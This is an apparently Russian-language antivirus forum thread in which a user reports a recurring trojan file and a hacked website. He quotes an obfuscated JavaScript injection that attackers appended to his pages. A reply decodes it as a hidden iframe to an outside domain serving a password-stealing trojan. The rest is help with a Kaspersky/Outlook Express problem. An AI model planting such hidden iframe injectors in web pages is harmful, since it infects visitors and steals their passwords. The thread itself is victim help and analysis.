Перейти к содержанию

Троян с "Вечной жизнью"


NoAdmin

Рекомендуемые сообщения

н-даа и по каким помойкам Вас носило....новье (хорошо, что это решаемо)

 

Где только не носило;)

Все это скорее всего от взломанного ПО скачанного с инета.

Ссылка на комментарий
Поделиться на другие сайты

Может и от сайта зараженного, от ПО только одну версию можно получить, а через инет только актуальные новинки.

 

P>S> Все уехало в вирлаб.

Ссылка на комментарий
Поделиться на другие сайты

Может и от сайта зараженного, от ПО только одну версию можно получить, а через инет только актуальные новинки.

Логично. На днях "взломали/украли пароли/др.варианты" мои сайты

В корневой директории и в директории форума все файлы были модифицированы добавлением к конце страницы следующего кода:

 

<script type="text/javascript">

document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u0074\u006f\u006d\u0061\u006b\u0061\u0079\u0061\u006e\u002e\u0062\u0069\u007a\u002f\u0061\u0066\u0074\u0065\u0072\u0066\u0074\u0070\u0063\u0068\u0065\u006b\u002f\u0030\u0031\u0030\u0034\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');

</script>

 

 

И у меня еще проблема:

В C:\Documents and Settings\Admin (основной пользователь) время от времени появляется файл WIN.EXE , вирусов вроде нет, в процессы не лезет, я его удаляю, а он снова...

win.rar

 

Восстановление значка "Свернуть все окна":

Создай текстовый файл и туда скопируй:

 

[shell]

Command=2

IconFile=explorer.exe,3

[Taskbar]

Command=ToggleDesktop

 

После сохраняй как Свернуть все окна.scf

А лучше пользуйтесь WinKey+D - проще

Изменено пользователем NoAdmin
Ссылка на комментарий
Поделиться на другие сайты

Почему, это по версии касперского.

У меня KIS 7.0.0.125 de с базами от 4.04.08 8:20 - не определяет

а с базами 4.04.08 19:22 - определяет, Убедили!

Изменено пользователем NoAdmin
Ссылка на комментарий
Поделиться на другие сайты

В корневой директории и в директории форума все файлы были модифицированы добавлением к конце страницы следующего кода:

<script type="text/javascript">

document.write('\u003c\u......');

</script>

 

хм... расшифровываться как:

<iframe src=http://atomakayan*.biz*/afterftpchek/0104/index.php width=1 height=1 style="display:none"></iframe>

и грузиться в теории этот файл:

atomakayan.biz/my/load***.exe

(звездочки в код я вставил специально, что бы никто нечаянно не сделал контрл+с и контрл+в и ентер. т.е код - без них)))

 

 

файл (если верить касперу - сейчас лень было качать и ковырять) - пинч обыкновенный....

Изменено пользователем vidocq89
Ссылка на комментарий
Поделиться на другие сайты

- Пропали значки "Спам", "Не спам" в Outlook Express

 

Удаление KIS и повторная установка - результат не дали.

Изменено пользователем NoAdmin
Ссылка на комментарий
Поделиться на другие сайты

файл (если верить касперу - сейчас лень было качать и ковырять) - пинч обыкновенный....

Пинч...значит пароли тю-тю...необходимо менять.

 

baseeopiq32.dll - Trojan.Win32.SubSys.ca

Ссылка на комментарий
Поделиться на другие сайты

Пинч...значит пароли тю-тю...необходимо менять.

 

Да последнее время только этим и занимаемся! Спасибо!

 

 

- Пропали значки "Спам", "Не спам" в Outlook Express

 

Обновление KIS 7.0.0125 до 7.0.1.325 - ситуацию не исправило

Ссылка на комментарий
Поделиться на другие сайты

Обновление KIS 7.0.0125 до 7.0.1.325 - ситуацию не исправило

Добро пожаловать на форум! У меня была похожая проблема. Непомню как решил, но попропую посоетовать то, что делал я сам. Для начала Настройки-> Антиспам-> "Включить поддержку MS Outlook и т.д." и "Открывать Диспетчер писем при получении почты" галки снимаем. Далее ставим по умолчанию в панели управения почтовый клиент офис аутлук (если есть МС Офис), перезагружаемся. Потом ставим обратно галки в каспере которые сняли ранее, ставим обратно почтовый клиент по умолчанию аутлук экспресс, и запускаем его и смотрим.

Ссылка на комментарий
Поделиться на другие сайты

Добро пожаловать на форум!

Спасибо!

 

Снял птицы в KIS

Открыл Оутлук Офис - установил почтой по умолчанию

Перезагрузка ОС

Установил птицы в KIS

Открыл Оутлук Экспресс - установил почтой по умолчанию

Перезагрузил

 

Безрезультатно

 

Помогло только:

Удалить Касперского утилитой http://http://forum.kasperskyclub.ru/index...ost&id=4321 и снова установите 325ю или новее

Вопрос снят

 

Всем Спасибо

Изменено пользователем NoAdmin
Ссылка на комментарий
Поделиться на другие сайты

NoAdmin, поздравляю с решением проблемы! = ) Но ссылка которую Вы дали ведёт на главную страницу = ( Можно конкретную линку?

 

P.S. Спасибо, буду знать как лечить данную траблу в будущем = )

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • orpham
      От orpham
      Добрый день.
      15.02 вечером, зашифровало все файлы. Комп настроен для удаленного подключения по RDP, включен круглосуточно. Все файлы с расширением .kwx8/
      Помогите пож-та.
      Лог сканирования KVRT во вложении.
      report_2025.02.17_15.55.29.klr.rar
    • GLORYX
      От GLORYX
      не знаю как но где словил троян в диспечере задай просто находится пустой проц с аватаркой шестеренки пробовал через все програму успехом не увенчалось.
    • Hendehog
      От Hendehog
      Здравствуйте.
      Вирус замаскированный под файл от госорганов.
      Просканировал KVRT, DR.Web, и сняты логи автологгером.
      Прошу подсказки - что именно делается вирус, куда внедряется, как ворует деньги с банковских счетов?
      Ну и понять, чист сейчас ПК или нет.
      CollectionLog-2025.02.07-10.57.zip KVRT2020_Data.zip
    • KL FC Bot
      От KL FC Bot
      В галерее вашего смартфона почти наверняка найдется важная информация, сфотографированная для надежности и удобства — например, фото документов, банковских договоров или сид-фраз, позволяющих восстановить доступ к криптокошелькам. Все эти данные могут быть украдены вредоносным приложением, подобным обнаруженному нами стилеру SparkCat. В текущей конфигурации этот зловред обучен красть данные криптокошельков, но с другими настройками он может мгновенно перейти к краже любой другой ценной информации.
      Самое неприятное — этот зловред пробрался в официальные магазины приложений, и только из Google Play зараженные им аппы суммарно загрузили почти 250 тысяч раз. И если в Google Play вредоносные приложения не единожды обнаруживались и до этого, то в App Store троян-стилер обнаружен впервые. Как же устроена эта угроза и что сделать для защиты?
      Довесок к легитимным приложениям
      Приложения, содержащие вредоносные компоненты SparkCat, делятся на две группы. Некоторые из них — например, многочисленные схожие мессенджеры с заявленными функциями ИИ от одного и того же разработчика — очевидно, опубликованы сугубо как приманка. Но есть и другие — легитимные приложения сервисов доставки еды, чтения новостей, утилиты для владельцев криптокошельков. Как в них появилась троянская функциональность, мы не знаем. Возможно, это была атака на цепочку поставок, при которой был заражен один из вспомогательных компонентов — «кирпичиков», из которых собрано готовое приложение, или же разработчики намеренно встраивали трояна в свои приложения.
      Первое приложение, в котором мы обнаружили SparkCat — это сервис для доставки еды в ОАЭ и Индонезии под названием ComeCome. Зараженное приложение было обнаружено как в Google Play, так и в App Store
       
      View the full article
    • tau34
      От tau34
      Здравствуйте зашел на один сайт посмотреть pdf документ и Касперский выдад уведомление , мне сейчас надо как то удалять его или что? пишет вот такой троян:  HEUR:Trojan.PDF.Badur.gena
      я просто в браузере pdf открыл этот там видать ссылка на вредоносный сайт или что раз так Касперский срнагировал
       
      Сообщение от модератора kmscom Тема перемещена из раздела Помощь по персональным продуктам  
       
       
       
       
       
       
       
       

×
×
  • Создать...